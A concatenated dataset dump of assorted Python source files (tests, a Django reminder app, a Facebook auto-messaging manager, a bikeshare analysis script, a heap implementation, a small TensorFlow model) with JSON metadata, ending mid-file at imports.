'tool1_clusters_x': [c0_loc[0], c1_loc[0]],\n 'tool1_clusters_y': [c0_loc[1], c1_loc[1]],\n 'tool1_clusters_var_x': [c0_cov[0, 0], c1_cov[0, 0]],\n 'tool1_clusters_var_y': [c0_cov[1, 1], c1_cov[1, 1]],\n 'tool1_clusters_var_x_y': [c0_cov[0, 1], c1_cov[0, 1]],\n }\n\n def test_keys(self):\n for i in self.expected.keys():\n with self.subTest(i=i):\n self.assertIn(i, self.result)\n\n def test_cluster_values(self):\n for i in self.result.keys():\n with self.subTest(i=i):\n np.testing.assert_allclose(self.result[i], self.expected[i], atol=2)\n\n def test_type(self):\n for i in self.result.values():\n with self.subTest(i=i):\n self.assertIsInstance(i, list)\n\n\nclass TestReducerRequest(unittest.TestCase):\n def setUp(self):\n self.app = flask.Flask(__name__)\n request_data = json.dumps([\n {'data': {\n 'T0_tool1_x': [1, 4],\n 'T0_tool1_y': [2, 7],\n 'T0_tool2_x': [3],\n 'T0_tool2_y': [4]\n }},\n {'data': {\n 'T0_tool1_x': [1],\n 'T0_tool1_y': [2]\n }}\n ])\n self.request_kwargs = {\n 'data': request_data,\n 'content_type': 'application/json'\n }\n\n def test_process_request(self):\n expected = {\n 'T0_tool1_points_x': [1, 4, 1],\n 'T0_tool1_points_y': [2, 7, 2],\n 'T0_tool1_cluster_labels': [-1, -1, -1],\n 'T0_tool2_points_x': [3],\n 'T0_tool2_points_y': [4],\n 'T0_tool2_cluster_labels': [-1]\n }\n with self.app.test_request_context('/?eps=2', **self.request_kwargs):\n self.assertDictEqual(reducers.cluster_points.point_reducer_request(flask.request), expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"panoptes_aggregation/tests/reducer_tests/test_cluster_points.py","file_name":"test_cluster_points.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199872579","text":"from django.shortcuts import render, redirect\nfrom django.http import Http404\nfrom .models import Remainder\n\n\ndef index(request):\n #Queryset \n # SELEC * FROM Remainder\n remainders = Remainder.objects.all()\n print(remainders)\n return render(request,\"landing/index.html\",{\"recordatorios\":remainders})\n\n\ndef agregar(request):\n \n if request.method == 'POST':\n remainder = Remainder()\n remainder.titulo = request.POST['titulo']\n remainder.descripcion = request.POST['descripcion']\n remainder.prioridad = request.POST['prioridad']\n remainder.save()\n return redirect('landing:index')\n else:\n return render(request,\"landing/agregar.html\")\n\n\ndef detalle(request, pk):\n try:\n #SELECT * FROM Remainder WHERE id = pk\n remainder = Remainder.objects.get(id=pk)\n except:\n raise Http404\n \n return render(request,'landing/detalle.html',\n {\"recordatorio\":remainder})\n\n\ndef some(request):\n return render(request, 'some.html')\n\n\n\n\n\n\n\n\n\n\n\n\n ","sub_path":"landing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"509909694","text":"#!/usr/bin/env python2.3\n# -*- coding: utf-8 -*-\n#\n# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)\n#\n# (1) Kamaelia Contributors are listed in the AUTHORS file and at\n# http://www.kamaelia.org/AUTHORS - please extend this file,\n# not this notice.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -------------------------------------------------------------------------\n#\n# Full coverage testing of the NullPayloadRTP module.\n#\n\n# Test the module loads\nimport unittest\nimport sys ; sys.path.append(\"..\")\nimport Kamaelia.Util.Console\n\nclass ConsoleEcho_Test(unittest.TestCase):\n def test_init_minArgs(self):\n \"\"\"Smoke test with minimal arguments\"\"\"\n P = Kamaelia.Util.Console.ConsoleEchoer()\n self.assertEqual(P.__class__, Kamaelia.Util.Console.ConsoleEchoer, \"Correctly initialised value created\")\n self.assertTrue(not P.forwarder, \"This is not a forwarder\")\n self.assertTrue(P.init)\n\n def test_init_forwarder(self):\n \"\"\"Smoke test creating a forwarder\"\"\"\n P = Kamaelia.Util.Console.ConsoleEchoer(forwarder=True)\n self.assertEqual(P.__class__, Kamaelia.Util.Console.ConsoleEchoer, \"Correctly initialised value created\")\n self.assertTrue(P.forwarder, \"This is a forwarder\")\n self.assertTrue(P.init)\n\nif __name__==\"__main__\":\n unittest.main()\n","sub_path":"Test/test_ConsoleEcho.py","file_name":"test_ConsoleEcho.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"31491342","text":"from yaml import load, dump, YAMLError\nfrom mercurius.time import is_expired\nfrom mercurius.facebook import Facebook, COOKIES\nimport os\nimport random\n\nTEMPLATE = \"{0:25} {1:15} {2:10} {3:20} {4:15} {5:10} {6:1}\"\nFIELDS = TEMPLATE.format(\"FULLNAME\", \"CATEGORY\", \"FREQ.\", \"LAST MESSAGE\", \"ID\",\n \"REF.\", \"\")\n\n\ndef save(f):\n def dec(self, *args, **kwargs):\n f(self, *args, **kwargs)\n self.save_config()\n return dec\n\n\nclass Mercurius:\n def __init__(self, path):\n self.config_path = path\n\n def parse_config(self):\n try:\n with open(self.config_path, 'r') as f:\n self.c = load(f)\n self.messages = self.c[\"messages\"]\n self.friends = self.c[\"friends\"]\n self.cookies = self.c[\"cookies\"]\n # TODO: Write tests on invalid mercurius files\n # if not isinstance(self.c, dict)\n # or not \"friends\" in self.c.keys()\n # or not \"messages\" in c.keys():\n except YAMLError as e:\n print(\"[✖]'{1}': YAML parsing error: {0}\".format(e, path))\n except IOError as e:\n print(\"[✖]'{1}': {0}\".format(e.strerror, path))\n\n def save_config(self):\n try:\n with open(self.config_path, 'w') as f:\n f.write(dump(self.c, default_flow_style=False))\n except YAMLError as e:\n print(\"[✖]'{1}': YAML parsing error: {0}\".format(e, path))\n except IOError as e:\n print(\"[✖]'{1}': {0}\".format(e.strerror, path))\n\n @save\n def reset_config(self):\n self.c = {\"cookies\": 1, \"friends\": {}, \"messages\": {\"default\": []}}\n if os.path.exists(COOKIES):\n os.remove(COOKIES)\n print(\"[✓]Mercurius has been reset.\")\n\n @save\n def add_category(self, cat):\n if cat in self.messages.keys():\n print(\"[✖]Category '{}' already exists.\".format(cat))\n else:\n self.messages[cat] = []\n print(\"[✓]Category '{}' added.\".format(cat))\n\n @save\n def add_message(self, msg, cat):\n if cat in self.messages.keys():\n self.messages[cat].append(msg)\n print(\"[✓]'{}' added to category '{}'.\".format(msg, cat))\n else:\n print(\"[✖]Category '{}' does not exist.\".format(cat))\n\n @save\n def add_friend(self, name, freq, cat):\n if cat not in self.messages.keys():\n print(\"[✖]Category '{}' does not exist.\".format(cat))\n elif len(self.friends) > 0 and name in self.friends.keys():\n print(\"[✖]Friend '{}' already exists.\".format(name))\n else:\n f = Facebook(cookies_enabled=self.cookies)\n self.friends[name] = {\"frequency\": freq, \"category\": cat}\n self.friends[name][\"id\"], self.friends[name][\"fullname\"] = \\\n f.get_user_id_fullname(name)\n if self.friends[name][\"id\"] is None or \\\n self.friends[name][\"fullname\"] is None:\n print(\"[✖]No friend found for '{}'.\".format(name))\n del self.friends[name]\n return\n print(\"[✓]Friend '{}' added to '{}'.\".format(name, cat))\n\n def show_categories(self):\n for cat in sorted(self.messages):\n print(\"{} => {}\".format(cat.upper(),\n ' _ '.join([f for f in self.friends\n if self.friends[f][\"category\"] == cat])\n ))\n if len(self.messages[cat]) > 0:\n i = 1\n for msg in self.messages[cat]:\n print(\"({}) '{}'\".format(i, msg))\n i += 1\n else:\n print(\"No messages.\")\n\n def show_friends(self):\n if len(self.friends) == 0:\n print(\"No Friends.\")\n return\n f = Facebook(cookies_enabled=self.cookies)\n print(FIELDS)\n for name, friend in sorted(self.friends.items()):\n date = f.get_last_message_date(friend[\"id\"])\n indicator = '✖' if is_expired(date, friend[\"frequency\"]) else '✓'\n print(TEMPLATE.format(friend[\"fullname\"], friend[\"category\"],\n friend[\"frequency\"], date, friend[\"id\"],\n name, indicator))\n\n @save\n def remove_category(self, cat):\n if cat not in self.messages.keys():\n print(\"[✖]Category '{}' does not exist.\".format(cat))\n elif any(self.friends[friend][\"category\"] == cat\n for friend in self.friends):\n print(\"[✖]Category '{}' contains some friends.\".format(cat))\n elif len(self.messages) < 2:\n print(\"[✖]Can't remove the last category.\")\n else:\n del self.messages[cat]\n print(\"[✓]Category '{}' removed.\".format(cat))\n\n @save\n def remove_message(self, cat, n):\n try:\n del self.messages[cat][n - 1]\n print(\"[✓]Message removed from '{}'.\".format(cat))\n except IndexError:\n print(\"[✖]ID '{}' does not match any message in category '{}'\"\n .format(n, cat))\n\n @save\n def remove_friend(self, name):\n try:\n del self.friends[name]\n print(\"[✓]Friend '{}' removed.\".format(name))\n except KeyError:\n print(\"[✖]Friend '{}' does not exist.\".format(name))\n\n @save\n def change_cookies_setting(self, value):\n self.c[\"cookies\"] = value\n print(\"[✓]Cookies setting set to {}.\".format(value))\n\n def send(self):\n if len(self.friends) == 0:\n print(\"No Friends.\")\n return\n f = Facebook(cookies_enabled=self.cookies)\n recipients = []\n for name, friend in sorted(self.friends.items()):\n date = f.get_last_message_date(friend[\"id\"])\n if is_expired(date, friend[\"frequency\"]):\n cat = friend[\"category\"]\n if len(self.messages[cat]) > 0:\n f.send_message(random.choice(self.messages[cat]),\n friend[\"id\"])\n recipients.append(name)\n else:\n print(\"[✖]No messages in category '{}'.\".format(cat))\n break\n else:\n if len(recipients) > 0:\n print(\"[✓]A message has been sent to: {}.\".format(', '.join(recipients)))\n else:\n print(\"[✓]You're up-to-date.\")\n","sub_path":"mercurius/mercurius.py","file_name":"mercurius.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"623626560","text":"import math\nclass Circulo:\n def __init__(self, pc, r):\n self.pc=pc\n self.r=float(r)\n def contem(self, p):\n self.p=p\n distancia = ((self.pc.x-self.p.x)**2 +(self.pc.y - self.p.y)**2)**0.5\n if distancia < self.r:\n return True\n else:\n return False","sub_path":"backup/user_006/ch89_2020_05_07_21_54_04_734734.py","file_name":"ch89_2020_05_07_21_54_04_734734.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"511131718","text":"import numpy as np\nfrom numpy.testing import assert_array_equal\nfrom nose.tools import assert_equal\n\nfrom pystruct.utils import compress_sym, expand_sym\n\n\ndef test_symmetric_tools_symmetric():\n rnd = np.random.RandomState(0)\n # generate random symmetric matrix\n for size in [4, 6, 11]:\n x = rnd.normal(size=(size, size))\n x = x + x.T\n\n compressed = compress_sym(x, make_symmetric=False)\n assert_equal(compressed.shape, (size * (size + 1) / 2, ))\n\n uncompressed = expand_sym(compressed)\n assert_array_equal(x, uncompressed)\n\n\ndef test_symmetric_tools_upper():\n rnd = np.random.RandomState(0)\n # generate random matrix with only upper triangle.\n # expected result is full symmetric matrix\n for size in [4, 6, 11]:\n x = rnd.normal(size=(size, size))\n x = x + x.T\n x_ = x.copy()\n x[np.tri(size, k=-1, dtype=np.bool)] = 0\n\n compressed = compress_sym(x, make_symmetric=True)\n assert_equal(compressed.shape, (size * (size + 1) / 2, ))\n\n uncompressed = expand_sym(compressed)\n assert_array_equal(x_, uncompressed)\n","sub_path":"pystruct/tests/test_utils/test_utils_inference.py","file_name":"test_utils_inference.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"517040038","text":"# External sources used\n# --> https://pandas.pydata.org/pandas-docs/stable/reference/frame.html\n# --> http://unicode.org/emoji/charts/emoji-list.html#1f92d \n# --> https://www.geeksforgeeks.org/python-program-to-print-emojis/\nimport time\nimport numpy as np\nimport pandas as pd\ndef get_filters(): \n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Input: Function takes nothing and returns a tuple.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n\n # Asks the user to enter the name of city for which they want to explore the data.\n # A while loop is used to make sure that the cityname entered is correct and if not,user is asked again to enter the correct city name.\n # An emoji is also used source for which is provided at top.\n city_name = input('Enter the city name to start exploring(CHICAGO / WASHINGTON / NEW YORK CITY) : ')\n while city_name.lower() not in ('chicago','washington','new york city'):\n city_name = input('OOPS..!!\\U0001F605 Please type CITY NAME from (CHICAGO / WASHINGTON / NEW YORK CITY)..!! Lets start again.')\n\n # Asks the user to enter the month of year for which they want to explore the data.\n # A while loop is used to make sure that the month name entered is correct and if not,user is asked again to enter the correct month name. \n month_name = input('looking for a particular month or for all months,type(\\'all\\') ? Enter the name of month or type \\'all\\' for no filter(in words) : ')\n while month_name.lower() not in ('january', 'february', 'march', 'april', 'may', 'june', 'all'):\n month_name = input('OOPS..!!\\U0001F605 Please type correct MONTH NAME..!! Enter again.')\n \n # Asks the user to enter the month of year for which they want to explore the data.\n # A while loop is used to make sure that the month name entered is correct and if not,user is asked again to enter the correct month name. \n day = input('For a particular day or all days(\\'all\\' for all days) ? Enter response(in words) : ')\n while day.lower() not in ('sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'all'):\n day = input('OOPS..!!\\U0001F605 Please enter correct DAY (eg. \\'sunday\\'). Enter again.')\n print('\\n'*2)\n\n # Function returns the tuple of strings.\n return city_name.lower(),month_name.lower(),day.lower()\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # Converting the name of month to respective integer representation.\n date = {'januray':1,'february':2,'march':3,'april':4,'may':5,'june':6}\n for key,value in date.items():\n if key == month.lower():\n req_month = value\n\n # Reads the csv file for city entered by user and creates a DataFrame.\n file = pd.read_csv(city.replace(' ','_').lower() + '.csv')\n \n # Replacing the Null values with zeros in the DataFrame\n file = file.fillna(0)\n\n # Converting Start time to datetime format and creating additional columns to apply filter to the DataFrame.\n file['Start Time'] = pd.to_datetime(file['Start Time'])\n file['Week_day'] = file['Start Time'].dt.weekday_name\n file['Month'] = file['Start Time'].dt.month\n file['Hours'] = file['Start Time'].dt.hour\n\n # Filtering the data from DataFrame.\n if month != 'all':\n file = file[file['Month'] == req_month] \n if day != 'all':\n file = file[file['Week_day'] == day.title()]\n\n # Filtered DataFrame is returned.\n return file\n\ndef time_stats(df,month,day):\n \"\"\" Displays statistics on the most frequent times of travel.\"\"\"\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n \n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n\n # Checks if the the filter is applied for month or not.If yes,the function doesnt print the most popular month.\n if month == 'all':\n\n # Counts the number of times an unique value appears in the 'Month' column and picks up the maximum of those.\n most_pop_month_count = df['Month'].value_counts().max() \n\n # Picks up the value which appears most frequently in the 'Month' column.\n most_pop_month = df['Month'].mode()[0]\n\n # Converting the integer representation of month to respective name of month\n date = np.array(['Januray','February','March','April','May','June'])\n most_pop_month_new = date[most_pop_month-1]\n print('Most popular month :',most_pop_month_new,'\\tcount :',most_pop_month_count)\n\n # Checks if the the filter is applied for day of week or not.If yes,the function doesnt print the most popular day of week.\n if day == 'all':\n\n # Counts the number of times an unique value appears in the 'Week_day' column and picks up the maximum of those.\n most_pop_weekday_count = df['Week_day'].value_counts().max()\n \n # Picks up the value which appears most frequently in the 'Week_day' column.\n most_pop_weekday = df['Week_day'].mode()[0]\n print('Most popular weekday :',most_pop_weekday,'\\tcount :',most_pop_weekday_count)\n \n # Counts the number of times an unique value appears in the 'Hours' column and picks up the maximum of those.\n most_pop_hour_count = df['Hours'].value_counts().max()\n \n # Picks up the value which appears most frequently in the 'Hours' column.\n most_pop_hour = df['Hours'].mode()[0]\n print('Most popular hour :',most_pop_hour,'\\tcount :',most_pop_hour_count)\n\n # Marking the time as end time for calculation of time taken for execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n \n # Prints empty space to seperate data printed by function.\n print('\\n'*2)\n\ndef station_stats(df):\n \"\"\"Takes a DataFrame and displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n \n # Counts the number of times an unique value appears in the Start Station column and prints the name of Start Station appearing the most and its count in the column.\n pop_start_station_count = df['Start Station'].value_counts().max()\n pop_start_station = df['Start Station'].mode()[0]\n print('Most popular Start Station :',pop_start_station,'\\tcount:',pop_start_station_count)\n\n # Counts the number of times an unique value appears in the End Station column and prints the name of End Station appearing the most and its count in the column.\n pop_end_station_count = df['End Station'].value_counts().max()\n pop_end_station = df['End Station'].mode()[0]\n print('Most popular End Station :',pop_end_station,'\\tcount:',pop_end_station_count)\n \n # Combines two columns in DataFrame and prints the most frequent value in this column along with its count in column\n df['journey'] = df['Start Station'] + ' TO ' + df['End Station']\n most_pop_trip = df['journey'].mode()[0]\n max_freq_count = df.groupby(['Start Station','End Station'])['Start Time'].count().max()\n print('The most popular frequent trip :',most_pop_trip,'\\tcount :',max_freq_count)\n \n # Marking the time as end time for calculation of time taken for execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n \n # Prints empty space to seperate data printed by function.\n print('\\n'*2)\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n\n # Using numpy's sum function to calculate total of trip durations.\n total_time = np.sum(df['Trip Duration'])\n print('Total travel time duration :',total_time)\n\n # Using numpy's mean function to calculate average trip duration.\n mean_time = np.mean(df['Trip Duration'])\n print('Mean travel time duration :',mean_time)\n\n # Marking the time as end time for calculation of time taken for execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n \n # Prints empty space to seperate data printed by function.\n print('\\n'*2)\n\ndef user_stats(df,city):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n \n print('\\nCalculating User Stats...\\n')\n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n\n # Calculating the number of unique rows in 'User_type' column and printing each type along with their respective count. \n user_type = df['User Type'].value_counts()\n print('Total SUBSCRIBERS :',user_type['Subscriber'],'\\tTotal CUSTOMERS:',user_type['Customer'])\n \n # Conditional statement to check if the city entered by user is 'washington'.If yes,then it displays no data as the columns dont exist in washingtons csv file.If not,then it displays the result.\n if city == 'washington':\n print('Sorry..!!There is no Birth year and Gender information for Washington city')\n else:\n # Counts number of rows for each unique value in 'Gender' column and prints each type along with its count in this column.\n gender = df['Gender'].value_counts()\n print('Total MALES :',gender['Male'],'\\tTotal FEMALES :',gender['Female'])\n \n # prints most frequently occuring value in 'Birth Year' as most common birth year,minimum of those as earliest birth year and maximum of those as latest birth year\n latest_birth_year = df['Birth Year'].max()\n earliest_birth_year = df['Birth Year'].replace([0,None]).min(skipna= True)\n common_birth_year = df['Birth Year'].replace([0,None]).mode()[0]\n print('Most common birth year :',common_birth_year,'\\nEarliest birth year :',earliest_birth_year,'\\nLatest birth year :',latest_birth_year)\n\n # Marking the time as end time for calculation of time taken for execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n\n # Prints empty space to seperate data printed by function.z\n print('\\n'*2)\n\ndef raw_data(df,city):\n \"\"\" Takes DataFrame and returns row by row data as per input provided by user. \"\"\" \n # Asks user if user want to print individual data and keeps on printing data row by row until user types 'No'.\n response = input('Do you want to see individual data ? ')\n i = 0\n while response.lower() == 'yes' or response.lower() == 'y':\n # creates a dictionary to represent the individual data\n user = {'id' : df.loc[i][0],\n 'Start Time' : df['Start Time'][i],\n 'End Time' : df['End Time'][i],\n 'Trip Duration(sec)' : df['Trip Duration'][i],\n 'Start Station' : df['Start Station'][i],\n 'End Station' : df['End Station'][i],\n 'User Type' : df['User Type'][i] }\n # Ensures that the code prints all information about every user for each city\n if city != 'washington':\n user['Gender'] = df['Gender'][i]\n user['Birth Year'] = df['Birth Year'][i]\n # prints information for each raw in the frame as a dictionary\n print(user)\n response = input('\\nDo you want to print individual data ? Enter yes or no : ')\n i += 1\n return\n\ndef main():\n # Asks the user if user wants to explore bikeshare and if the input is 'yes',it executes the code,prints the result and asks again until user enters 'no'.\n restart = input('\\nWould you like to expolre bikeshare data? Enter yes or no.\\n')\n while restart.lower() == 'yes' or restart.lower() == 'y': # conditional statement to start execution\n city, month, day = get_filters() # function is called and returned values are assigned to variables\n df = load_data(city, month, day) # function is called and returned value is assigned to variable\n time_stats(df,month,day) # function called with three arguments\n station_stats(df) # function called\n trip_duration_stats(df) # function called\n user_stats(df,city) # function called with two argumnets\n raw_data(df,city) # function called with two argumnets\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n \nif __name__ == '__main__':\n # Check if the code is running as main or as imported.If its main,the main function is called.\n main()","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":13293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429083282","text":"\"\"\"\r\nFile: arrayHeap.py\r\nNames: Laurie Jones, Harry Pinkerton, James Lawson\r\nProject: 10\r\n\"\"\"\r\n\r\nfrom p10utils.arrayList import ArrayList\r\nfrom p10utils.abstractHeap import AbstractHeap\r\n\r\n\r\nclass ArrayHeap(AbstractHeap):\r\n \"\"\"An array-based implementation of a heap.\"\"\"\r\n \r\n DEFAULT_SIZE = 10\r\n \r\n def __init__(self, sourceCollection = None):\r\n \"\"\"Initialization of a heap.\"\"\"\r\n self._heap = ArrayList() \r\n super().__init__(sourceCollection)\r\n \r\n def add(self, item):\r\n \"\"\"Adds item to the end of the array and then walks it up to the top,\r\n stopping when parent is less than the new item\"\"\"\r\n \r\n self._size += 1\r\n self._heap.append(item)\r\n curPos = len(self._heap) - 1\r\n \r\n while curPos > 0:\r\n parent = (curPos - 1) // 2\r\n parentItem = self._heap[parent]\r\n if parentItem <= item:\r\n break\r\n \r\n else:\r\n self._heap[curPos] = self._heap[parent]\r\n self._heap[parent] = item\r\n curPos = parent\r\n \r\n def pop(self):\r\n \"\"\"Swaps the top element with the last element, then walks the top\r\n element down until both children are larger than the current node.\"\"\"\r\n if self.isEmpty():\r\n raise KeyError(\"The heap is empty.\")\r\n \r\n self._size -= 1\r\n topItem = self._heap[0]\r\n bottomItem = self._heap.pop(len(self._heap) - 1)\r\n \r\n if len(self._heap) == 0:\r\n return bottomItem\r\n \r\n self._heap[0] = bottomItem\r\n lastIndex = len(self._heap) - 1\r\n curPos = 0\r\n \r\n while True:\r\n leftChild = curPos * 2 + 1\r\n rightChild = curPos * 2 + 2\r\n \r\n if leftChild > lastIndex:\r\n break\r\n \r\n if rightChild > lastIndex:\r\n maxChild = leftChild\r\n \r\n else:\r\n leftItem = self._heap[leftChild]\r\n rightItem = self._heap[rightChild]\r\n if leftItem < rightItem:\r\n maxChild = leftChild\r\n \r\n else:\r\n maxChild = rightChild\r\n \r\n maxItem = self._heap[maxChild]\r\n \r\n if bottomItem <= maxItem:\r\n break\r\n \r\n else:\r\n self._heap[curPos] = self._heap[maxChild]\r\n self._heap[maxChild] = bottomItem\r\n curPos = maxChild\r\n \r\n return topItem\r\n\r\n\r\n\r\n\r\n def _getRoot(self):\r\n \"\"\"Should return the way to access the root based on an implementation.\"\"\"\r\n return 0\r\n \r\n def _getParent(self, index):\r\n \"\"\"Returns access to the parent from the index or node.\"\"\"\r\n return (index - 1) / 2\r\n \r\n def _getLeftChild(self, index):\r\n \"\"\"Returns access to the left child from the index or node.\"\"\"\r\n return index * 2 + 1\r\n \r\n def _getRightChild(self, index): \r\n \"\"\"Returns access to the right child from the index or node.\"\"\"\r\n return index * 2 + 2\r\n \r\n def _getData(self, index):\r\n \"\"\"Returns the data from the index or node.\"\"\"\r\n return self._heap[index]\r\n \r\n def _insideTree(self, node):\r\n \"\"\"Returns True if the index or node is within the tree.\"\"\"\r\n lastIndex = len(self._heap) - 1\r\n if node <= lastIndex:\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n\r\n\r\n","sub_path":"project10/arrayHeap.py","file_name":"arrayHeap.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229890853","text":"import sys\n\nfp = open(sys.argv[1], \"r\")\noutput = open(sys.argv[2], \"w\")\n\ntotal = int(fp.readline())\n\ncase = 0\n\nalphabet = {\n \"A\": 1,\n \"B\": 2,\n \"C\": 3,\n \"D\": 4,\n \"E\": 5,\n \"F\": 6,\n \"G\": 7,\n \"H\": 8,\n \"I\": 9,\n \"J\": 10,\n \"K\": 11,\n \"L\": 12,\n \"M\": 13,\n \"N\": 14,\n \"O\": 15,\n \"P\": 16,\n \"Q\": 17,\n \"R\": 18,\n \"S\": 19,\n \"T\": 20,\n \"U\": 21,\n \"V\": 22,\n \"W\": 23,\n \"X\": 24,\n \"Y\": 25,\n \"Z\": 26\n}\n\n\nfor string in fp:\n case = case + 1\n final = \"\"\n\n for letter in string:\n # print(\"final:\", final)\n if letter == \"\\n\":\n continue\n\n if len(final) == 0:\n final = final + letter\n continue\n\n if alphabet[letter] < alphabet[final[0]]:\n final = final + letter\n continue\n else:\n final = letter + final\n\n out = \"Case #{}: {}\".format(case, final)\n print(out)\n output.write(out + \"\\n\")\n\nfp.close()\noutput.close()\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_SatKan_one.py","file_name":"16_1_1_SatKan_one.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"107003640","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport re\n\nif sys.version_info.major >= 3:\n import urllib.request\n\n r = urllib.request.urlopen('https://data.iana.org/TLD/tlds-alpha-by-domain.txt')\n assert r.status == 200\n data = r.read().decode('utf-8').split('\\n')\nelse:\n import urllib\n\n r = urllib.urlopen('https://data.iana.org/TLD/tlds-alpha-by-domain.txt')\n assert r.getcode() == 200\n data = r.read().split('\\n')\n\nversion = re.match('^# Version (?P[0-9]+).*$', data[0]).group('version')\ntlds = [i.lower() for i in data[1:] if i and not i.startswith('#')]\n\n\ntarget_dir = 'tlds'\n\nwith open(os.path.join(target_dir, '_data.py'), 'w') as f:\n f.write('tld_set = set(%s)\\n' % (tlds, ))\n\nwith open('version.py', 'w') as f:\n f.write('version = %s\\n' % version)\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"560498409","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\n\n# Create Initial variable\ndef init_variable(shape):\n return(tf.Variable(tf.truncated_normal(shape = shape)))\n\n# Fix random variable\nseed = 100\ntf.set_random_seed(seed)\n\n# Import data\nDF = pd.read_excel('proto.xlsx', sheetname=0)\ndf = np.array(DF.iloc[1:380, 3:9])\n\n# Control panel\nLEARNING_RATE = 0.01\nTRAINING_EPOCHS = 1000\nBATCH_SIZE = 100\n\n# Placeholder variables\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\n\nNF = 3\nNN = 100\nNUM_LAYER = 5\n\n# First Layer\nw0 = init_variable(shape=[NF, NN])/np.sqrt(NF/2)\nb0 = init_variable(shape=[NN])\nlayer = tf.nn.relu(tf.matmul(x, w0) + b0)\n\nfor Iter in range(NUM_LAYER):\n w = init_variable(shape=[NN, NN])/np.sqrt(NN/2)\n b = init_variable(shape=[NN])\n layer = tf.nn.relu(tf.matmul(layer, w) + b)\n\n# Final Layer\nw = init_variable(shape=[NN, NF])/np.sqrt(NN/2)\nb = init_variable(shape=[NF])\nscore = tf.matmul(layer, w) + b\n\n# Optimization method\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=score))\ntrain = tf.train.AdagradOptimizer(LEARNING_RATE).minimize(cost)\n\n# Performance measures\nprediction = tf.argmax(score, 1)\ncorrect_prediction = tf.equal(prediction, tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# Create TensorFlow session\nwith tf.Session() as sess:\n # Initialize variables\n tf.global_variables_initializer().run()\n\n # train\n for epoch in range(TRAINING_EPOCHS):\n _, cost_this_batch = sess.run([train, cost], feed_dict={x: df[0:300, 0:3], y: df[0:300, 3:6]})\n print(\"Optimization Finished!\")\n\n print(\"Accuracy:\", sess.run(accuracy, feed_dict={x: df[300:, 0:3], y: df[300:, 3:6]}))\n","sub_path":"ML.Proto/ProtoML.py","file_name":"ProtoML.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295611233","text":"import functools\nimport itertools\nimport json\nimport logging\nimport uuid\nfrom abc import ABCMeta\nfrom operator import and_\n\nimport sqlalchemy as sa\nfrom aiohttp.web import Request\nfrom functools import reduce\nfrom 